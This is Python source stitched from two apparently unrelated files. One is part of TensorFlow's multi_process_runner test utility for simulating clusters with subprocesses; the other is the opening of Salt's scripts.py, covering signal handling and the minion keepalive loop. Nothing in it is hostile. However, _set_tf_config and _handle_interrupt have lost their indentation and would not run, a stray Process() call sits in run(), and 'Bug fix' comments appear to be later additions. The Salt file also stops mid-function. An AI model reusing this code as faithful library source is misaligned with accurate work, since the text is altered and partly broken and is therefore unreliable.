      # chance to dump stacktraces. After _FORCE_KILL_WAIT_SEC, we SIGKILL them.
      self._watchdog_thread.join(_FORCE_KILL_WAIT_SEC)
      if self._watchdog_thread.is_alive():
        logging.error('Timeout when waiting for child processes to '
                      'print stacktrace. Sending SIGKILL...')
        self.terminate_all()
        self._watchdog_thread.join()
      process_statuses = self._get_process_statuses()
      self._reraise_if_subprocess_error(process_statuses)
      raise SubprocessTimeoutError(
          'One or more subprocesses timed out, where timeout was set to {}s. '
          'Please change the `timeout` argument for '
          '`MultiProcessRunner.join()` or `multi_process_runner.run()` '
          'if it should be adjusted.'.format(timeout),
          self._get_mpr_result(process_statuses))

    for (task_type, task_id), p in self._processes.items():
      logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)

    process_statuses = self._get_process_statuses()
    self._reraise_if_subprocess_error(process_statuses)

    # Checking all the processes that are expected to exit properly.
    for (task_type, task_id), p in self._processes.items():
      # Successfully exiting process has exit code 0. We ignore processes that
      # are terminated.
      assert p.exitcode is not None
      if (p.exitcode > 0 and (task_type, task_id) not in self._terminated):
        raise UnexpectedSubprocessExitError(
            'Subprocess %s-%d exited with exit code %s. See logs for details.'
            % (task_type, task_id, p.exitcode),
            self._get_mpr_result(process_statuses))

    logging.info('Joining log reading threads.')
    for thread in self._reading_threads:
      thread.join()
    logging.info('Joined log reading threads.')

    # Clear the alarm.
    signal.alarm(0)

    return self._get_mpr_result(process_statuses)

  def _get_mpr_result(self, process_statuses):
    # Assemble the (stdout, return_value) result namedtuple from the collected
    # per-process statuses and the streaming queue.
    stdout = self._queue_to_list(self._streaming_queue)
    return_values = []
    for process_status in process_statuses.values():
      if process_status.return_value is not None:
        return_values.append(process_status.return_value)
    return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)

  def terminate(self, task_type, task_id):
    """Terminates the process with `task_type` and `task_id`.

    If auto_restart=True, the terminated task will be restarted unless the chief
    has already exited with zero exit code.

    Args:
      task_type: the task type.
      task_id: the task id.
    """
    with self._process_lock:
      p = self._processes.get((task_type, task_id), None)
      if p is None:
        raise ValueError('{}-{} does not exist'.format(task_type, task_id))
      self._terminated.add((task_type, task_id))
      # TODO(crccw): change to use Process.terminate() as well.
      self._parent_to_sub_queue.put('terminate {} {}'.format(
          task_type, task_id))
      p.join()

  def _terminate_all(self, sig=None):
    """Terminates all subprocesses.

    The caller is required to hold self._process_lock.

    Args:
      sig: the signal used to terminate the process. The default is SIGKILL.
    """

    # Use SIGKILL as default. In systems where that's unavailable such as
    # windows, use SIGTERM.
    sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
    for (task_type, task_id), p in self._processes.items():
      if p.exitcode is not None:
        logging.info('%s-%d has already exited. Not terminating.', task_type,
                     task_id)
        continue
      try:
        os.kill(p.pid, sig)
        self._terminated.add((task_type, task_id))
        logging.info('%s-%d terminated with signal %r.', task_type, task_id,
                     sig)
      except ProcessLookupError:
        # Process exited between the exitcode check and the kill; nothing to do.
        logging.info('Attempting to kill %s-%d but it does not exist.',
                     task_type, task_id)

  def terminate_all(self, sig=None):
    """Terminates all subprocesses."""
    with self._process_lock:
      self._terminate_all(sig)
class _Process(multi_process_lib.Process):
  """A modified `multiprocessing.Process` that can set up environment variables."""

  # TODO(crccw): consider moving other logics in _ProcFunc to _Process.

  def __init__(self, test_env, **kwargs):
    super(_Process, self).__init__(**kwargs)
    self._test_env = test_env
    # Wrap the inherited run() so that environment variables are exported in
    # the child process before any user code executes.
    self._actual_run = getattr(self, 'run')
    self.run = self._run_with_setenv

  def _run_with_setenv(self):
    # We need to set environment variables before doing anything because
    # setenv() is not thread-safe.
    test_env = self._test_env
    if test_env.grpc_fail_fast is not None:
      os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
    if test_env.visible_gpus:
      # Restrict this worker to its assigned GPUs (roundrobin assignment done
      # by the parent when share_gpu=False).
      os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(
          [str(i) for i in test_env.visible_gpus])
    _set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
                   test_env.rpc_layer)
    return self._actual_run()
class _ProcFunc(object):
  """Represents a callable to run in a subprocess."""

  @contextlib.contextmanager
  def _runtime_mode(self, executing_eagerly):
    # Run the wrapped code under the same eager/graph mode as the parent.
    if executing_eagerly:
      with context.eager_mode():
        yield
    else:
      with context.graph_mode():
        yield

  def _message_checking_func(self, task_type, task_id):
    """A function that regularly checks messages from parent process."""
    # TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
    while True:
      try:
        message = self._resources.parent_to_sub_queue.get(block=False)

        # Currently the only possible message is termination.
        if not message.startswith('terminate'):
          raise ValueError('Unrecognized message: {}'.format(message))

        if message == 'terminate {} {}'.format(task_type, task_id):
          break
        else:
          # If the message is not targeting this process, put it back to the
          # queue.
          self._resources.parent_to_sub_queue.put(message)
          time.sleep(1)
      except Queue.Empty:
        time.sleep(0.1)
    # Report a successful status before exiting, so the parent does not treat
    # this cooperative termination as a failure.
    self._resources.process_status_queue.put(
        _ProcessStatusInfo(
            task_type=task_type,
            task_id=task_id,
            is_successful=True,
            exc_info=None,
            return_value=None))
    # `os._exit(1)` is used to more reliably terminate a subprocess.
    os._exit(1)  # pylint: disable=protected-access

  def _close_streaming(self):
    """Close stdout, stderr and streaming pipe.

    We need to explicitly close them since Tensorflow may take a while to exit,
    so that the reading threads in the main process can exit more quickly.
    """
    sys.stdout.flush()
    sys.stderr.flush()
    sys.stdout.close()
    sys.stderr.close()
    self._resources.streaming_pipe_w.close()

  def __call__(self, resources, test_env, fn, args, kwargs, use_dill_for_args):
    """The wrapper function that actually gets run in child process(es)."""

    global _barrier

    self._resources = resources
    _barrier = self._resources.barrier
    # fn was serialized with dill by the parent (to support lambdas etc.).
    fn = dill.loads(fn)
    if use_dill_for_args:
      args = dill.loads(args)
      kwargs = dill.loads(kwargs)

    if faulthandler is not None:
      faulthandler.enable()
      faulthandler.register(signal.SIGTERM, chain=True)

    # All logging should go to stderr to be streamed to the main process.
    logging.set_stderrthreshold(logging.DEBUG)

    # Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
    # print() and logging.*() write directly to `streaming_pipe_w`.
    # Unfortunately since we cannot prepend task_type and task_id information to
    # the streamed logs we will need a thread per subprocess to distinguish
    # where the piece of message is from.
    os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
    os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())

    pid = os.getpid()
    logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
                 test_env.task_type, test_env.task_id)
    logging.info('TF_CONFIG: %r', os.environ['TF_CONFIG'])

    # The thread will be dedicated to checking messages from the parent process.
    threading.Thread(  # pylint: disable=unexpected-keyword-arg
        target=self._message_checking_func,
        args=(test_env.task_type, test_env.task_id),
        daemon=True).start()

    if test_env.v2_enabled:
      v2_compat.enable_v2_behavior()

    with self._runtime_mode(test_env.executing_eagerly):
      info = _run_contained(test_env.task_type, test_env.task_id, fn, args,
                            kwargs)
      self._resources.process_status_queue.put(info)

      # Re-raise the exception in addition to reporting it to the parent
      # process, so that even if `--test_timeout` flag is set and the
      # error doesn't make it to be shown in parent process before bazel's
      # timeout, the log would still show what happens in this subprocess,
      # instead of silently suppressing the error due to early bazel
      # timeout. Raising an error in the subprocess produces stack trace in
      # the log, but the program continues running.
      if not info.is_successful:
        six.reraise(*info.exc_info)

      self._close_streaming()

    # Exit with code 0 as it's considered successful exit at this point.
    sys.exit(0)
# Active MultiProcessPoolRunner. We need to shut them down when the program
# exits, and this is by setting the `tearDownModule` of the module containing
# `__main__`. Note this is set in both the parent process and the subprocesses.
# A WeakSet so that registration here does not keep a runner alive by itself.
_active_pool_runners = weakref.WeakSet()
def _shutdown_all_pool_runners():
  """Shuts down every `MultiProcessPoolRunner` registered as active."""
  for runner in _active_pool_runners:
    runner.shutdown()
def is_oss():
  """Returns whether the test is run under OSS."""
  argv = sys.argv
  if not argv:
    return False
  return 'bazel' in argv[0]
class MultiProcessPoolRunner(object):
  """A utility class to start a process pool to simulate a cluster.

  It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
  expensive initialization cost of Tensorflow.
  """

  def __init__(self, cluster_spec, initializer=None, share_gpu=True):
    """Creates a multi-process pool runner.

    Args:
      cluster_spec: Dict for cluster spec. The following is an example of
        cluster with three workers.
        {"worker": ["worker0.example.com:2222",
                    "worker1.example.com:2222",
                    "worker2.example.com:2222"]}
      initializer: a callable to called at the startup of worker processes.
      share_gpu: Whether to share GPUs among workers. If False, each worker is
        assigned different GPUs in a roundrobin fashion.

    Raises:
      RuntimeError: if `multi_process_runner.test_main()` is not called.
      ValueError: if there are more than one chief in the `cluster_spec`.
    """
    # Register with the module-level WeakSet so that the injected
    # tearDownModule can shut this pool down when the test program exits.
    _active_pool_runners.add(self)
    self._cluster_spec = cluster_spec
    self._initializer = initializer
    self._share_gpu = share_gpu
    # Maps (task_type, task_id) -> parent end of the worker's duplex pipe.
    self._conn = {}
    # Backing MultiProcessRunner; created lazily in _start().
    self._runner = None

  def __del__(self):
    # Best-effort cleanup if the pool is garbage-collected without an
    # explicit shutdown() call.
    self.shutdown()

  def shutdown(self):
    """Shuts down the worker pool."""
    # Closing the parent ends of the pipes makes each worker's conn.recv()
    # raise EOFError, which terminates its serving loop.
    for conn in self._conn.values():
      conn.close()
    self._conn = {}
    if self._runner is not None:
      try:
        self._runner.join()
      except Exception as e:  # pylint: disable=broad-except
        logging.error(
            'Ignoring exception when shutting down MultiProcessPoolRunner: %s',
            e)
      self._runner = None

  def _start(self):
    """Starts the worker pool."""
    # We need different arguments for different processes so we're passing a
    # no-op fn here and use start_single_process instead.
    if dill is None:
      raise unittest.SkipTest(
          'TODO(b/150264776): Resolve dependency issue in CI')

    self._runner = MultiProcessRunner(
        fn=lambda: None,
        cluster_spec=self._cluster_spec,
        use_dill_for_args=False,
        share_gpu=self._share_gpu)
    # The initializer is serialized with dill so a worker can deserialize and
    # run it once at startup; dill (unlike pickle) supports lambdas/closures.
    if self._initializer:
      initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
    else:
      initializer = None
    # Start one worker process per task, each with its own duplex pipe used
    # to send serialized callables in and receive status objects back.
    for task_type, addresses in self._cluster_spec.items():
      for task_id, _ in enumerate(addresses):
        conn1, conn2 = multiprocessing.Pipe(duplex=True)
        self._conn[(task_type, task_id)] = conn1
        self._runner.start_single_process(
            task_type,
            task_id,
            fn=_pool_runner_worker,
            args=(task_type, task_id, initializer, conn2))

  def run(self, fn, args=None, kwargs=None):
    """Runs `fn` with `args` and `kwargs` on all jobs.

    Args:
      fn: The function to be run.
      args: Optional positional arguments to be supplied in `fn`.
      kwargs: Optional keyword arguments to be supplied in `fn`.

    Returns:
      A list of return values.
    """
    _check_initialization()
    # TODO(b/150264776): skip in OSS until it's implemented.
    multi_process_lib.Process()
    if self._runner is None:
      self._start()

    # Serialize with dill so lambdas and closures can be shipped to workers.
    fn = dill.dumps(fn, dill.HIGHEST_PROTOCOL)
    for conn in self._conn.values():
      conn.send((fn, args or [], kwargs or {}))

    process_statuses = []
    for (task_type, task_id), conn in self._conn.items():
      logging.info('Waiting for the result from %s-%d', task_type, task_id)
      try:
        process_statuses.append(conn.recv())
      except EOFError:
        # This shouldn't happen due to exceptions in fn. This usually
        # means bugs in the runner.
        self.shutdown()
        raise RuntimeError('Unexpected EOF. Worker process may have died. '
                           'Please report a bug')

    return_values = []
    for process_status in process_statuses:
      assert isinstance(process_status, _ProcessStatusInfo)
      # Re-raise the first worker failure in the parent so the test fails.
      if not process_status.is_successful:
        six.reraise(*process_status.exc_info)
      if process_status.return_value is not None:
        return_values.append(process_status.return_value)
    return return_values
def _pool_runner_worker(task_type, task_id, initializer, conn):
  """Serving loop executed by each worker in a MultiProcessPoolRunner.

  Repeatedly receives a dill-serialized callable plus its arguments over
  `conn`, executes it via `_run_contained`, and sends the resulting status
  object back. The loop ends when the parent closes its end of the pipe
  (which surfaces here as EOFError). Exceptions raised by the callable are
  captured inside the status object rather than propagated.

  Args:
    task_type: the task type.
    task_id: the task index.
    initializer: a callable to execute during startup.
    conn: a multiprocessing.Connection object to listen for tasks and send
      results.
  """
  if initializer:
    startup_fn = dill.loads(initializer)
    startup_fn()
  while True:
    try:
      payload = conn.recv()
    except EOFError:
      break
    serialized_fn, args, kwargs = payload
    task_fn = dill.loads(serialized_fn)
    status = _run_contained(task_type, task_id, task_fn, args, kwargs)
    # Flush both streams so the parent sees all output before the status.
    for stream in (sys.stdout, sys.stderr):
      stream.flush()
    conn.send(status)
def _run_contained(task_type, task_id, fn, args, kwargs):
  """Invokes `fn(*args, **kwargs)` and wraps the outcome for reporting.

  Both the return value (on success) and the exc_info triple (on failure)
  are captured so the caller can either collect the result or re-raise.

  Args:
    task_type: the task type.
    task_id: the task index.
    fn: the function to be run.
    args: optional positional arguments to be supplied in `fn`.
    kwargs: optional keyword arguments to be supplied in `fn`.

  Returns:
    a _ProcessStatusInfo.
  """
  # Note: a `SystemExit` raised by `fn` (e.g. via sys.exit()) deliberately
  # propagates out of this function; only `Exception` subclasses are caught.
  try:
    result = fn(*args, **kwargs)
  except Exception:  # pylint: disable=broad-except
    return _ProcessStatusInfo(
        task_type=task_type,
        task_id=task_id,
        is_successful=False,
        exc_info=sys.exc_info(),
        return_value=None)
  return _ProcessStatusInfo(
      task_type=task_type,
      task_id=task_id,
      is_successful=True,
      exc_info=None,
      return_value=result)
@tf_export('__internal__.distribute.multi_process_runner'
           '.SubprocessTimeoutError',
           v1=[])
class SubprocessTimeoutError(RuntimeError):
  """Raised when at least one subprocess times out.

  The `mpr_result` attribute carries the namedtuple object describing the
  multi-process run up to the timeout; see
  `tf.__internal__.distribute.multi_process_runner.run` for its structure.
  """

  def __init__(self, msg, mpr_result):
    super().__init__(msg)
    self.mpr_result = mpr_result
@tf_export('__internal__.distribute.multi_process_runner'
           '.UnexpectedSubprocessExitError',
           v1=[])
class UnexpectedSubprocessExitError(RuntimeError):
  """Raised when at least one subprocess exits unexpectedly.

  The `mpr_result` attribute carries the namedtuple object describing the
  multi-process run up to the unexpected exit; see
  `tf.__internal__.distribute.multi_process_runner.run` for its structure.
  """

  def __init__(self, msg, mpr_result):
    super().__init__(msg)
    self.mpr_result = mpr_result
@tf_export(
    '__internal__.distribute.multi_process_runner.NotInitializedError', v1=[])
class NotInitializedError(RuntimeError):
  """Raised when `multi_process_runner.run` is used without initialization.

  To initialize properly, call
  `tf.__internal__.distribute.multi_process_runner.test_main()` within the
  `if __name__ == '__main__':` block of the test module.
  """
def _check_initialization():
  """Raises NotInitializedError unless multi_process_lib has been set up."""
  if multi_process_lib.initialized():
    return
  raise NotInitializedError(
      '`multi_process_runner` is not initialized. '
      'Please call `tf.__internal__.distribute.multi_process_runner.'
      'test_main()` within `if __name__ == \'__main__\':` block '
      'in your python module to properly initialize '
      '`multi_process_runner`.')
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
@tf_export('__internal__.distribute.multi_process_runner.run', v1=[])
def run(fn,
        cluster_spec,
        rpc_layer=None,
        max_run_time=None,
        return_output=False,
        timeout=_DEFAULT_TIMEOUT_SEC,
        args=None,
        kwargs=None):
  """Run `fn` in multiple processes according to `cluster_spec`.

  Given a callable `fn`, `tf.__internal__.distribute.multi_process_runner.run`
  launches multiple processes, each of which runs `fn`. These processes are
  referred to as "subprocesses" or "child processes". Each of those subprocesses
  will have their `TF_CONFIG` environment variable set, according to
  `cluster_spec` and their task types. The stdout of the subprocesses are
  streamed to the main process' and thus available in logs (if `stream_output`
  is True), with [type-id] prefix.

  `tf.__internal__.distribute.multi_process_runner.run` will block until all
  subprocesses have successfully exited, and return a namedtuple object that
  represents the run result. This object has a `return_value` attribute, which
  is a list that contains subprocesses `fn`'s return values, for those
  subprocesses that successfully returned from `fn`. The order of `return_value`
  list is not meaningful. If an optional arg `return_output` (default to False)
  is set to True, the namedtuple object will have an additional attribute
  `stdout`, which is a list containing the stdout of the subprocesses. If any
  subprocess' `fn` ends up raising an error, that error will be reraised from
  `tf.__internal__.distribute.multi_process_runner.run`, and the aforementioned
  namedtuple object will be available through the exception's
  `mpr_result` attribute.

  This utility is used for simulating running TensorFlow programs across
  multiple task types, and each of the task type may contain more than one task
  (except for "chief" where more than one task is prohibited). Test coverage of
  multi-worker training is the main application of this utility, where code
  written for multi-worker training can be realistically covered in unit tests.

  Any test module that uses
  `tf.__internal__.distribute.multi_process_runner.run()` must call
  `tf.__internal__.distribute.multi_process_runner.test_main()` instead of
  regular `test.main()` inside `if __name__ == '__main__':` block for proper
  initialization.

  Args:
    fn: Function to be run on child processes. This will be run on processes for
      all task types.
    cluster_spec: Dict for cluster spec. The utility function
      `tf.__internal__.distribute.multi_process_runner.create_cluster_spec` can
      be conveniently used to create such dict. The following is an example of
      cluster with three workers and two ps's.
      {"worker": ["worker0.example.com:2222",
                  "worker1.example.com:2222",
                  "worker2.example.com:2222"],
       "ps": ["ps0.example.com:2222",
              "ps1.example.com:2222"]}
    rpc_layer: RPC layer to use. Default value is 'grpc'.
    max_run_time: `None` or integer. If not `None`, child processes are forced
      to exit at approximately this many seconds after this utility is called.
      We achieve this through `signal.alarm()` api. Note that this is best
      effort at Python level since Python signal handler does not get executed
      when it runs lower level C/C++ code. So it can be delayed for arbitrarily
      long time. If any of the child process is still running when
      `max_run_time` is up, they will be force-terminated and an
      `tf.__internal__.distribute.multi_process_runner
      .UnexpectedSubprocessExitError`
      may be raised. If `None`, child processes are not forced to exit.
    return_output: If True, the output/error from the subprocesses should be
      collected to be attached to the resulting namedtuple returned from this
      utility. The list of output can be retrieved via `stdout` attribute.
      Defaults to False.
    timeout: optional integer or `None`. If provided as an integer, and not all
      processes report status within roughly `timeout` seconds, a
      `tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError`
      exception will be raised. If `None`,
      `tf.__internal__.distribute.multi_process_runner.run` never times out.
      Defaults to the constant `_DEFAULT_TIMEOUT_SEC` defined in
      `multi_process_runner` module.
    args: Positional arguments to be sent to `fn` run on subprocesses.
    kwargs: Keyword arguments to be sent to `fn` run on subprocesses.

  Returns:
    A namedtuple object, which has two attributes,
    `return_value` and `stdout`. `return_value` always contains a list of
    returnvalues from the subprocesses, although the order is not meaningful.
    If `return_output` argument is True, `stdout` is available that contains a
    list of all messages from subprocesses' stdout and stderr, and the order
    is mostly chronological.

  Raises:
    RuntimeError: if
      `tf.__internal__.distribute.multi_process_runner.test_main()` is
      not called in test's `if __name__ == '__main__':` block.
    ValueError: if there are more than one chief in the `cluster_spec`.
    tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError: if
      not all processes report status approximately
      within `timeout` seconds. When this is raised, a
      namedtuple object can be retrieved by
      `tf.__internal__.distribute.multi_process_runner.SubprocessTimeoutError`'s
      `mpr_result` attribute, which has the same
      structure as above 'Returns' section describes.
    tf.__internal__.distribute.multi_process_runner
    .UnexpectedSubprocessExitError:
      If any of the subprocesses did not exit
      properly (for example, they exit on SIGTERM or SIGKILL signal). When
      this is raised, a namedtuple object can be retrieved by
      `tf.__internal__.distribute.multi_process_runner
      .UnexpectedSubprocessExitError`'s
      `mpr_result` attribute, which has the
      same structure as above 'Returns' section describes. If `max_run_time`
      is not `None`, it is expected that some subprocesses may be
      force-killed when `max_run_time` is up, and this is raised in those
      cases.
    Exception: if there is an Exception propagated from any subprocess. When
      this is raised, a namedtuple object can be retrieved by
      `tf.__internal__.distribute.multi_process_runner
      .UnexpectedSubprocessExitError`
      `mpr_result` attribute, which has the
      same structure as above 'Returns' section describes.

  Examples:

  ```python
  class SimpleMultiProcessTest(tf.test.TestCase):

    def test_simple_printing_and_return(self):

      def fn():
        resolver = tf.distribute.cluster_resolver.TFConfigClusterResolver()

        # This will print "[chief-0]: Task type: chief , task id: 0"
        # for chief, for example.
        logging.info('Task type: %s, task id: %d',
                     resolver.task_type, resolver.task_id)

        return resolver.task_type

      result = tf.__internal__.distribute.multi_process_runner.run(
          fn=fn,
          cluster_spec=(
              tf.__internal__
              .distribute.multi_process_runner.create_cluster_spec(
                  has_chief=True, num_workers=2)))
      assert sorted(result.return_value) == ['chief', 'worker', 'worker']

    def test_error_from_fn(self):

      def fn():
        resolver = tf.distribute.cluster_resolver.TFConfigClusterResolver()
        raise ValueError('Task type {}, task id {} is errors out'.format(
            resolver.task_type, resolver.task_id))

      with self.assertRaisesRegexp(ValueError,
                                   'Task type worker, task id 0 is errors out'):
        cluster_spec = (
            tf.__internal__.distribute.multi_process_runner.create_cluster_spec(
                num_workers=1))
        tf.__internal__.distribute.multi_process_runner.run(
            fn=fn, cluster_spec=cluster_spec)

  if __name__ == '__main__':
    tf.__internal__.distribute.multi_process_runner.test_main()
  ```
  """
  # Thin convenience wrapper: create a runner, start all tasks, and block on
  # join(), which raises the error types documented above on failure/timeout.
  runner = MultiProcessRunner(
      fn,
      cluster_spec,
      rpc_layer,
      max_run_time=max_run_time,
      return_output=return_output,
      args=args,
      kwargs=kwargs)
  runner.start()
  return runner.join(timeout)
# This is set by MultiProcessRunner in worker processes.
# It remains None in the parent process, which is how get_barrier() detects
# that it was called outside of a subprocess.
_barrier = None
@tf_export('__internal__.distribute.multi_process_runner.get_barrier', v1=[])
def get_barrier():
  """Returns a `multiprocessing.Barrier` for `multi_process_runner.run`.

  The returned barrier may be used inside the `fn` passed to
  `tf.__internal__.distribute.multi_process_runner.run`: a task that calls
  `barrier.wait()` blocks until every other task has reached the same
  `barrier.wait()` call, after which all tasks proceed individually. All
  tasks (subprocesses) in the cluster must reach the `barrier.wait()` call;
  blocking on only a subset of tasks is currently not supported.

  Returns:
    A `multiprocessing.Barrier` for `multi_process_runner.run`.

  Raises:
    ValueError: if called in the main process instead of a subprocess
      launched by `multi_process_runner`.
  """
  if _barrier is not None:
    return _barrier
  raise ValueError(
      'barrier is not defined. It is likely because you are calling '
      'get_barrier() in the main process. get_barrier() can only be called '
      'in the subprocesses.'
  )
# Process-wide multiprocessing.Manager singleton, created lazily by manager().
_manager = None
# Guards the lazy creation of _manager above.
_manager_lock = threading.Lock()
def manager():
  """Returns the process-wide multiprocessing manager, creating it lazily.

  The manager object controls a server process that holds Python objects
  which can be shared across processes, enabling parent/subprocess
  communication, e.g.:

  ```python
  manager = multi_process_runner.manager()
  some_event_happening_in_subprocess = manager.Event()
  mpr = multi_process_runner.MultiProcessRunner(fn, cluster_spec,
      args=(some_event_happening_in_subprocess,))
  mpr.start()
  some_event_happening_in_subprocess.wait()
  # Do something that only should after some event happens in subprocess.
  ```

  Users of multi_process_runner should not create additional
  `multiprocessing.Manager()` objects themselves; doing so can result in a
  segfault in some cases. This must only be called after
  multi_process_runner.test_main() has run.
  """
  _check_initialization()
  global _manager
  with _manager_lock:
    if _manager is None:
      _manager = multiprocessing.Manager()
    return _manager
@tf_export('__internal__.distribute.multi_process_runner.test_main', v1=[])
def test_main():
  """Main function to be called within `__main__` of a test file.

  Any test module that uses
  `tf.__internal__.distribute.multi_process_runner.run()` must invoke this
  in its `if __name__ == '__main__':` block instead of the regular
  `test.main()`, or an error will be raised when
  `tf.__internal__.distribute.multi_process_runner.run()` is used. It takes
  care of the initialization needed for launching multiple subprocesses.

  Example:

  ```python
  class MyTestClass(tf.test.TestCase):
    def testSomething(self):
      # Testing code making use of
      # `tf.__internal__.distribute.multi_process_runner.run()`.

  if __name__ == '__main__':
    tf.__internal__.distribute.multi_process_runner.test_main()
  ```
  """
  # Inject tearDownModule() into the main module to shut down all pool
  # runners; active pool runners would otherwise block program exit. Any
  # previously installed tearDownModule is chained. atexit was tried in the
  # past and doesn't work in some deployments, hence this approach.
  main_module = sys.modules['__main__']
  previous_teardown = getattr(main_module, 'tearDownModule', None)

  def tear_down_module():
    _shutdown_all_pool_runners()
    if previous_teardown is not None:
      previous_teardown()

  main_module.tearDownModule = tear_down_module
  multi_process_lib.test_main()
|
scripts.py | # -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import time
import signal
import logging
import functools
import threading
import traceback
import signal
import functools
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
    '''
    Shared SIGINT/SIGTERM handler installed by _install_signal_handlers:
    builds a helpful exit message for Ctrl-c and delegates to
    _handle_interrupt, honoring the client's hard_crash option.
    '''
    try:
        # This raises AttributeError on Python 3.4 and 3.5 if there is no current exception.
        # Ref: https://bugs.python.org/issue23003
        trace = traceback.format_exc()
    except AttributeError:
        trace = ''
    try:
        hardcrash = client.options.hard_crash
    except (AttributeError, KeyError):
        # Not every client exposes an options object; default to graceful.
        hardcrash = False

    if signum == signal.SIGINT:
        exit_msg = '\nExiting gracefully on Ctrl-c'
        try:
            # If a job was already published, tell the user how to look up
            # the return data later.
            jid = client.local_client.pub_data['jid']
            exit_msg += (
                '\n'
                'This job\'s jid is: {0}\n'
                'The minions may not have all finished running and any remaining '
                'minions will return upon completion. To look up the return data '
                'for this job later, run the following command:\n\n'
                'salt-run jobs.lookup_jid {0}'.format(jid)
            )
        except (AttributeError, KeyError):
            # No published job to report on (e.g. not a LocalClient run).
            pass
    else:
        exit_msg = None

    _handle_interrupt(
        SystemExit(exit_msg),
        Exception('\nExiting with hard crash on Ctrl-c'),
        hardcrash, trace=trace)
def _install_signal_handlers(client):
    '''
    Install SIGINT and SIGTERM handlers that delegate to ``_handle_signals``
    for *client*, unless custom handlers are already installed.
    '''
    # Only take over a signal that still has the default disposition, so
    # callers who installed their own handlers are left alone.
    if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
        # No custom signal handling was added, install our own
        signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
    if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
        # No custom signal handling was added, install our own.
        # Bug fix: this branch previously re-installed the SIGINT handler,
        # leaving SIGTERM at its default disposition.
        signal.signal(signal.SIGTERM, functools.partial(_handle_signals, client))
def salt_master():
    '''
    Start the salt master.
    '''
    import salt.cli.daemons

    daemon = salt.cli.daemons.Master()
    daemon.start()
def minion_process():
    '''
    Start a minion process.

    Runs the Minion daemon in this (child) process, restarts on known salt
    transport errors via the SALT_KEEPALIVE exit code, and starts a watchdog
    thread that force-exits if the parent process disappears.
    '''
    import salt.utils.platform
    import salt.utils.process
    import salt.cli.daemons

    # salt_minion spawns this function in a new process
    salt.utils.process.appendproctitle('KeepAlive')

    def handle_hup(minion_daemon, sig, frame):
        # SIGHUP asks the running minion to reload its configuration.
        minion_daemon.minion.reload()

    lock = threading.RLock()

    def suicide_when_without_parent(parent_pid):
        '''
        Have the minion suicide if the parent process is gone

        NOTE: small race issue where the parent PID could be replace
        with another process with same PID!
        '''
        # The main thread grabs `lock` in its `finally` on the way out; once
        # it holds the lock this watchdog can no longer acquire it and stops.
        while lock.acquire(blocking=False):
            lock.release()
            time.sleep(5)
            try:
                # check pid alive (Unix only trick!)
                if os.getuid() == 0 and not salt.utils.platform.is_windows():
                    os.kill(parent_pid, 0)
            except OSError as exc:
                # forcibly exit, regular sys.exit raises an exception-- which
                # isn't sufficient in a thread
                log.error('Minion process encountered exception: %s', exc)
                os._exit(salt.defaults.exitcodes.EX_GENERIC)

    # Bug fix: initialize before the try block. Previously, if Minion()
    # itself raised one of the handled exceptions, `minion` was unbound and
    # the except block crashed with a NameError instead of restarting.
    minion = None
    try:
        if not salt.utils.platform.is_windows():
            thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
            thread.start()

        minion = salt.cli.daemons.Minion()
        signal.signal(signal.SIGHUP,
                      functools.partial(handle_hup,
                                        minion))
        minion.start()
    except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
        lock.acquire(blocking=True)
        log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
        log.warning('** Restarting minion **')
        delay = 60
        if minion is not None and hasattr(minion, 'config'):
            delay = minion.config.get('random_reauth_delay', 60)
        delay = randint(1, delay)
        log.info('waiting random_reauth_delay %ss', delay)
        time.sleep(delay)
        # SALT_KEEPALIVE tells the parent loop in salt_minion() to restart us.
        sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
    finally:
        lock.acquire(blocking=True)
def salt_minion():
    '''
    Start the salt minion in a subprocess.
    Auto restart minion on error.
    '''
    import signal

    import salt.utils.platform
    import salt.utils.process
    salt.utils.process.notify_systemd()

    import salt.cli.daemons
    import multiprocessing
    if '' in sys.path:
        sys.path.remove('')

    # On Windows there is no fork-based keepalive; run the minion directly.
    if salt.utils.platform.is_windows():
        minion = salt.cli.daemons.Minion()
        minion.start()
        return

    if '--disable-keepalive' in sys.argv:
        sys.argv.remove('--disable-keepalive')
        minion = salt.cli.daemons.Minion()
        minion.start()
        return

    def escalate_signal_to_process(pid, signum, sigframe):  # pylint: disable=unused-argument
        '''
        Escalate the signal received to the multiprocessing process that
        is actually running the minion
        '''
        # escalate signal
        os.kill(pid, signum)

    # keep one minion subprocess running
